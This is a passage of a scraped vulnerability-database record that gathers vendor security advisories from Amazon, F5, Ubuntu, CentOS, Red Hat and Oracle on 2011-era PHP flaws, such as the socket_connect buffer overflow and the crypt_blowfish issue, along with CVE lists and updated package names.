5.3.7 and 5.3.8 triggers a call to the __autoload function, which makes it easier for remote attackers to execute arbitrary code by providing a crafted URL and leveraging potentially unsafe behavior in certain PEAR packages and custom autoloaders.\n\nphp: changes to is_a() in 5.3.7 may allow arbitrary code execution with certain code\n\nA signedness issue was found in the way the PHP crypt() function handled 8-bit characters in passwords when using Blowfish hashing. Up to three characters immediately preceding a non-ASCII character (one with the high bit set) had no effect on the hash result, thus shortening the effective password length. This made brute-force guessing more efficient as several different passwords were hashed to the same value.\n\nA signedness issue was found in the way the crypt() function in the PostgreSQL pgcrypto module handled 8-bit characters in passwords when using Blowfish hashing. Up to three characters immediately preceding a non-ASCII character (one with the high bit set) had no effect on the hash result, thus shortening the effective password length. This made brute-force guessing more efficient as several different passwords were hashed to the same value.\n\ncrypt_blowfish before 1.1, as used in PHP before 5.3.7 on certain platforms, PostgreSQL before 8.4.9, and other products, does not properly handle 8-bit characters, which makes it easier for context-dependent attackers to determine a cleartext password by leveraging knowledge of a password hash.\n\nA stack-based buffer overflow flaw was found in the way the PHP socket extension handled long AF_UNIX socket addresses. An attacker able to make a PHP script connect to a long AF_UNIX socket address could use this flaw to crash the PHP interpreter.\n\nStack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary code via a long pathname for a UNIX socket.\n\nThe rfc1867_post_handler function in main/rfc1867.c in PHP before 5.3.7 does not properly restrict filenames in multipart/form-data POST requests, which allows remote attackers to conduct absolute path traversal attacks, and possibly create or overwrite arbitrary files, via a crafted upload request, related to a \"file path injection vulnerability.\"\n\nAn off-by-one flaw was found in PHP. If an attacker uploaded a file with a specially-crafted file name it could cause a PHP script to attempt to write a file to the root (/) directory. By default, PHP runs as the \"apache\" user, preventing it from writing to the root directory.\n\nThe rfc1867_post_handler function in main/rfc1867.c in PHP before 5.3.7 does not properly restrict filenames in multipart/form-data POST requests, which allows remote attackers to conduct absolute path traversal attacks, and possibly create or overwrite arbitrary files, via a crafted upload request, related to a 'file path injection vulnerability.'\n\nUse-after-free vulnerability in the substr_replace function in PHP 5.3.6 and earlier allows context-dependent attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact by using the same variable for multiple arguments.\n\nA use-after-free flaw was found in the PHP substr_replace() function. If a PHP script used the same variable as multiple function arguments, a remote attacker could possibly use this to crash the PHP interpreter or, possibly, execute arbitrary code.\n\n \n**Affected Packages:** \n\n\nphp\n\n \n**Issue Correction:** \nRun _yum update php_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php-cli-5.3.8-3.19.amzn1.i686 \n php-debuginfo-5.3.8-3.19.amzn1.i686 \n php-xml-5.3.8-3.19.amzn1.i686 \n php-soap-5.3.8-3.19.amzn1.i686 \n php-process-5.3.8-3.19.amzn1.i686 \n php-pspell-5.3.8-3.19.amzn1.i686 \n php-mysql-5.3.8-3.19.amzn1.i686 \n php-mssql-5.3.8-3.19.amzn1.i686 \n php-ldap-5.3.8-3.19.amzn1.i686 \n php-gd-5.3.8-3.19.amzn1.i686 \n php-fpm-5.3.8-3.19.amzn1.i686 \n php-devel-5.3.8-3.19.amzn1.i686 \n php-pgsql-5.3.8-3.19.amzn1.i686 \n php-5.3.8-3.19.amzn1.i686 \n php-dba-5.3.8-3.19.amzn1.i686 \n php-odbc-5.3.8-3.19.amzn1.i686 \n php-common-5.3.8-3.19.amzn1.i686 \n php-mcrypt-5.3.8-3.19.amzn1.i686 \n php-xmlrpc-5.3.8-3.19.amzn1.i686 \n php-tidy-5.3.8-3.19.amzn1.i686 \n php-bcmath-5.3.8-3.19.amzn1.i686 \n php-mbstring-5.3.8-3.19.amzn1.i686 \n php-pdo-5.3.8-3.19.amzn1.i686 \n php-intl-5.3.8-3.19.amzn1.i686 \n php-snmp-5.3.8-3.19.amzn1.i686 \n php-zts-5.3.8-3.19.amzn1.i686 \n php-imap-5.3.8-3.19.amzn1.i686 \n php-embedded-5.3.8-3.19.amzn1.i686 \n \n src: \n php-5.3.8-3.19.amzn1.src \n \n x86_64: \n php-dba-5.3.8-3.19.amzn1.x86_64 \n php-debuginfo-5.3.8-3.19.amzn1.x86_64 \n php-odbc-5.3.8-3.19.amzn1.x86_64 \n php-process-5.3.8-3.19.amzn1.x86_64 \n php-zts-5.3.8-3.19.amzn1.x86_64 \n php-common-5.3.8-3.19.amzn1.x86_64 \n php-pdo-5.3.8-3.19.amzn1.x86_64 \n php-mssql-5.3.8-3.19.amzn1.x86_64 \n php-mbstring-5.3.8-3.19.amzn1.x86_64 \n php-devel-5.3.8-3.19.amzn1.x86_64 \n php-cli-5.3.8-3.19.amzn1.x86_64 \n php-pspell-5.3.8-3.19.amzn1.x86_64 \n php-snmp-5.3.8-3.19.amzn1.x86_64 \n php-pgsql-5.3.8-3.19.amzn1.x86_64 \n php-soap-5.3.8-3.19.amzn1.x86_64 \n php-mcrypt-5.3.8-3.19.amzn1.x86_64 \n php-xmlrpc-5.3.8-3.19.amzn1.x86_64 \n php-xml-5.3.8-3.19.amzn1.x86_64 \n php-ldap-5.3.8-3.19.amzn1.x86_64 \n php-embedded-5.3.8-3.19.amzn1.x86_64 \n php-mysql-5.3.8-3.19.amzn1.x86_64 \n php-5.3.8-3.19.amzn1.x86_64 \n php-intl-5.3.8-3.19.amzn1.x86_64 \n php-bcmath-5.3.8-3.19.amzn1.x86_64 \n php-tidy-5.3.8-3.19.amzn1.x86_64 \n php-gd-5.3.8-3.19.amzn1.x86_64 \n php-fpm-5.3.8-3.19.amzn1.x86_64 \n php-imap-5.3.8-3.19.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2011-10-11T00:07:00", "published": "2011-10-11T00:07:00", "id": "ALAS-2011-007", "href": "https://alas.aws.amazon.com/ALAS-2011-7.html", "title": "Important: php", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2016-11-09T00:09:59", "bulletinFamily": "software", "cvelist": ["CVE-2011-1938", "CVE-2012-2143", "CVE-2010-2094", "CVE-2012-2329", "CVE-2010-2950", "CVE-2013-6712", "CVE-2012-3365"], "edition": 1, "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2014-12-11T00:00:00", "published": "2014-12-11T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/900/sol15903.html", "id": "SOL15903", "title": "SOL15903 - Multiple PHP vulnerabilities", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:24:17", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2484", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-1657", "CVE-2011-3182", "CVE-2010-1914", "CVE-2011-3267", "CVE-2011-2202"], "description": "Mateusz Kocielski, Marek Kroemeke and Filip Palian discovered that a \nstack-based buffer overflow existed in the socket_connect function's \nhandling of long pathnames for AF_UNIX sockets. A remote attacker \nmight be able to exploit this to execute arbitrary code; however, \nthe default compiler options for affected releases should reduce \nthe vulnerability to a denial of service. This issue affected Ubuntu \n10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1938)\n\nKrzysztof Kotowicz discovered that the PHP post handler function \ndoes not properly restrict filenames in multipart/form-data POST \nrequests. This may allow remote attackers to conduct absolute \npath traversal attacks and possibly create or overwrite arbitrary \nfiles. This issue affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu \n10.10 and Ubuntu 11.04. (CVE-2011-2202)\n\nIt was discovered that the crypt function for blowfish does not \nproperly handle 8-bit characters. This could make it easier for an \nattacker to discover a cleartext password containing an 8-bit character \nthat has a matching blowfish crypt value. This issue affected Ubuntu \n10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-2483)\n\nIt was discovered that PHP did not properly check the return values of \nthe malloc(3), calloc(3) and realloc(3) library functions in multiple \nlocations. This could allow an attacker to cause a denial of service \nvia a NULL pointer dereference or possibly execute arbitrary code. \nThis issue affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 \nand Ubuntu 11.04. (CVE-2011-3182)\n\nMaksymilian Arciemowicz discovered that PHP did not properly implement \nthe error_log function. This could allow an attacker to cause a denial \nof service via an application crash. This issue affected Ubuntu 10.04 \nLTS, Ubuntu 10.10, Ubuntu 11.04 and Ubuntu 11.10. (CVE-2011-3267)\n\nMaksymilian Arciemowicz discovered that the ZipArchive functions \naddGlob() and addPattern() did not properly check their flag arguments. \nThis could allow a malicious script author to cause a denial of \nservice via application crash. This issue affected Ubuntu 10.04 LTS, \nUbuntu 10.10, Ubuntu 11.04 and Ubuntu 11.10. (CVE-2011-1657)\n\nIt was discovered that the Xend opcode parser in PHP could be interrupted \nwhile handling the shift-left, shift-right, and bitwise-xor opcodes. \nThis could allow a malicious script author to expose memory \ncontents. This issue affected Ubuntu 10.04 LTS. (CVE-2010-1914)\n\nIt was discovered that the strrchr function in PHP could be interrupted \nby a malicious script, allowing the exposure of memory contents. This \nissue affected Ubuntu 8.04 LTS. (CVE-2010-2484)", "edition": 5, "modified": "2011-10-18T00:00:00", "published": "2011-10-18T00:00:00", "id": "USN-1231-1", "href": "https://ubuntu.com/security/notices/USN-1231-1", "title": "PHP Vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:27:08", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1471", "CVE-2011-1148", "CVE-2011-1466", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-0708", "CVE-2011-1468", "CVE-2011-1469", "CVE-2011-2202"], "description": "**CentOS Errata and Security Advisory** CESA-2011:1423\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA signedness issue was found in the way the PHP crypt() function handled\n8-bit characters in passwords when using Blowfish hashing. Up to three\ncharacters immediately preceding a non-ASCII character (one with the high\nbit set) had no effect on the hash result, thus shortening the effective\npassword length. This made brute-force guessing more efficient as several\ndifferent passwords were hashed to the same value. (CVE-2011-2483)\n\nNote: Due to the CVE-2011-2483 fix, after installing this update some users\nmay not be able to log in to PHP applications that hash passwords with\nBlowfish using the PHP crypt() function. Refer to the upstream\n\"CRYPT_BLOWFISH security fix details\" document, linked to in the\nReferences, for details.\n\nAn insufficient input validation flaw, leading to a buffer over-read, was\nfound in the PHP exif extension. A specially-crafted image file could cause\nthe PHP interpreter to crash when a PHP script tries to extract\nExchangeable image file format (Exif) metadata from the image file.\n(CVE-2011-0708)\n\nAn integer overflow flaw was found in the PHP calendar extension. A remote\nattacker able to make a PHP script call SdnToJulian() with a large value\ncould cause the PHP interpreter to crash. (CVE-2011-1466)\n\nMultiple memory leak flaws were found in the PHP OpenSSL extension. A\nremote attacker able to make a PHP script use openssl_encrypt() or\nopenssl_decrypt() repeatedly could cause the PHP interpreter to use an\nexcessive amount of memory. (CVE-2011-1468)\n\nA use-after-free flaw was found in the PHP substr_replace() function. If a\nPHP script used the same variable as multiple function arguments, a remote\nattacker could possibly use this to crash the PHP interpreter or, possibly,\nexecute arbitrary code. (CVE-2011-1148)\n\nA bug in the PHP Streams component caused the PHP interpreter to crash if\nan FTP wrapper connection was made through an HTTP proxy. A remote attacker\ncould possibly trigger this issue if a PHP script accepted an untrusted URL\nto connect to. (CVE-2011-1469)\n\nAn integer signedness issue was found in the PHP zip extension. An attacker\ncould use a specially-crafted ZIP archive to cause the PHP interpreter to\nuse an excessive amount of CPU time until the script execution time limit\nis reached. (CVE-2011-1471)\n\nA stack-based buffer overflow flaw was found in the way the PHP socket\nextension handled long AF_UNIX socket addresses. An attacker able to make a\nPHP script connect to a long AF_UNIX socket address could use this flaw to\ncrash the PHP interpreter. (CVE-2011-1938)\n\nAn off-by-one flaw was found in PHP. If an attacker uploaded a file with a\nspecially-crafted file name it could cause a PHP script to attempt to write\na file to the root (/) directory. By default, PHP runs as the \"apache\"\nuser, preventing it from writing to the root directory. (CVE-2011-2202)\n\nAll php53 and php users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to take\neffect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-November/030183.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-November/030184.html\n\n**Affected packages:**\nphp53\nphp53-bcmath\nphp53-cli\nphp53-common\nphp53-dba\nphp53-devel\nphp53-gd\nphp53-imap\nphp53-intl\nphp53-ldap\nphp53-mbstring\nphp53-mysql\nphp53-odbc\nphp53-pdo\nphp53-pgsql\nphp53-process\nphp53-pspell\nphp53-snmp\nphp53-soap\nphp53-xml\nphp53-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-1423.html", "edition": 3, "modified": "2011-11-03T03:59:22", "published": "2011-11-03T03:59:22", "href": "http://lists.centos.org/pipermail/centos-announce/2011-November/030183.html", "id": "CESA-2011:1423", "title": "php53 security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:31", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0708", "CVE-2011-1148", "CVE-2011-1466", "CVE-2011-1468", "CVE-2011-1469", "CVE-2011-1471", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA signedness issue was found in the way the PHP crypt() function handled\n8-bit characters in passwords when using Blowfish hashing. Up to three\ncharacters immediately preceding a non-ASCII character (one with the high\nbit set) had no effect on the hash result, thus shortening the effective\npassword length. This made brute-force guessing more efficient as several\ndifferent passwords were hashed to the same value. (CVE-2011-2483)\n\nNote: Due to the CVE-2011-2483 fix, after installing this update some users\nmay not be able to log in to PHP applications that hash passwords with\nBlowfish using the PHP crypt() function. Refer to the upstream\n\"CRYPT_BLOWFISH security fix details\" document, linked to in the\nReferences, for details.\n\nAn insufficient input validation flaw, leading to a buffer over-read, was\nfound in the PHP exif extension. A specially-crafted image file could cause\nthe PHP interpreter to crash when a PHP script tries to extract\nExchangeable image file format (Exif) metadata from the image file.\n(CVE-2011-0708)\n\nAn integer overflow flaw was found in the PHP calendar extension. A remote\nattacker able to make a PHP script call SdnToJulian() with a large value\ncould cause the PHP interpreter to crash. (CVE-2011-1466)\n\nMultiple memory leak flaws were found in the PHP OpenSSL extension. A\nremote attacker able to make a PHP script use openssl_encrypt() or\nopenssl_decrypt() repeatedly could cause the PHP interpreter to use an\nexcessive amount of memory. (CVE-2011-1468)\n\nA use-after-free flaw was found in the PHP substr_replace() function. If a\nPHP script used the same variable as multiple function arguments, a remote\nattacker could possibly use this to crash the PHP interpreter or, possibly,\nexecute arbitrary code. (CVE-2011-1148)\n\nA bug in the PHP Streams component caused the PHP interpreter to crash if\nan FTP wrapper connection was made through an HTTP proxy. A remote attacker\ncould possibly trigger this issue if a PHP script accepted an untrusted URL\nto connect to. (CVE-2011-1469)\n\nAn integer signedness issue was found in the PHP zip extension. An attacker\ncould use a specially-crafted ZIP archive to cause the PHP interpreter to\nuse an excessive amount of CPU time until the script execution time limit\nis reached. (CVE-2011-1471)\n\nA stack-based buffer overflow flaw was found in the way the PHP socket\nextension handled long AF_UNIX socket addresses. An attacker able to make a\nPHP script connect to a long AF_UNIX socket address could use this flaw to\ncrash the PHP interpreter. (CVE-2011-1938)\n\nAn off-by-one flaw was found in PHP. If an attacker uploaded a file with a\nspecially-crafted file name it could cause a PHP script to attempt to write\na file to the root (/) directory. By default, PHP runs as the \"apache\"\nuser, preventing it from writing to the root directory. (CVE-2011-2202)\n\nAll php53 and php users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to take\neffect.\n", "modified": "2018-06-06T20:24:27", "published": "2011-11-02T04:00:00", "id": "RHSA-2011:1423", "href": "https://access.redhat.com/errata/RHSA-2011:1423", "type": "redhat", "title": "(RHSA-2011:1423) Moderate: php53 and php security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:31", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1471", "CVE-2011-1148", "CVE-2011-1466", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-0708", "CVE-2011-1468", "CVE-2011-1470", "CVE-2011-1469", "CVE-2011-2202"], "description": "[5.3.3-3.3]\n- improve CVE-2011-1466 fix to cover CAL_GREGORIAN, CAL_JEWISH\n[5.3.3-3.1]\n- add security fixes for CVE-2011-2483, CVE-2011-0708, CVE-2011-1148,\n CVE-2011-1466, CVE-2011-1468, CVE-2011-1469, CVE-2011-1470,\n CVE-2011-1471, CVE-2011-1938, and CVE-2011-2202 (#740731)", "edition": 4, "modified": "2011-11-02T00:00:00", "published": "2011-11-02T00:00:00", "id": "ELSA-2011-1423", "href": "http://linux.oracle.com/errata/ELSA-2011-1423.html", "title": "php53 and php security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:11", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1471", "CVE-2012-2336", "CVE-2012-2386", "CVE-2011-1148", "CVE-2011-1466", "CVE-2012-0789", "CVE-2012-1823", "CVE-2011-1938", "CVE-2012-2143", "CVE-2011-4885", "CVE-2011-2483", "CVE-2012-0830", "CVE-2012-0781", "CVE-2011-0708", "CVE-2011-1468", "CVE-2012-0057", "CVE-2012-1172", "CVE-2011-1470", "CVE-2011-1469", "CVE-2011-4566", "CVE-2011-2202", "CVE-2010-2950", "CVE-2011-4153"], "description": "[5.3.3-14]\n- add security fix for CVE-2010-2950\n[5.3.3-13]\n- fix tests for CVE-2012-2143, CVE-2012-0789\n[5.3.3-12]\n- add fix for CVE-2012-2336\n[5.3.3-11]\n- add security fixes for CVE-2012-0781, CVE-2011-4153, CVE-2012-0057,\n CVE-2012-0789, CVE-2012-1172, CVE-2012-2143, CVE-2012-2386\n[5.3.3-9]\n- correct detection of = in CVE-2012-1823 fix (#818607)\n[5.3.3-8]\n- add security fix for CVE-2012-1823 (#818607)\n[5.3.3-7]\n- add security fix for CVE-2012-0830 (#786744)\n[5.3.3-6]\n- merge Joe's changes:\n- improve CVE-2011-1466 fix to cover CAL_GREGORIAN, CAL_JEWISH\n- add security fixes for CVE-2011-2483, CVE-2011-0708, CVE-2011-1148,\n CVE-2011-1466, CVE-2011-1468, CVE-2011-1469, CVE-2011-1470,\n CVE-2011-1471, CVE-2011-1938, and CVE-2011-2202 (#740732)\n[5.3.3-5]\n- remove extra php.ini-prod/devel files caused by %patch -b\n[5.3.3-4]\n- add security fixes for CVE-2011-4885, CVE-2011-4566 (#769755)", "edition": 4, "modified": "2012-06-29T00:00:00", "published": "2012-06-29T00:00:00", "id": "ELSA-2012-1046", "href": "http://linux.oracle.com/errata/ELSA-2012-1046.html", "title": "php security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

PHP &lt;= 5.3.5 socket_connect() Buffer Overflow Vulnerability

Description

No description provided by source.

PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability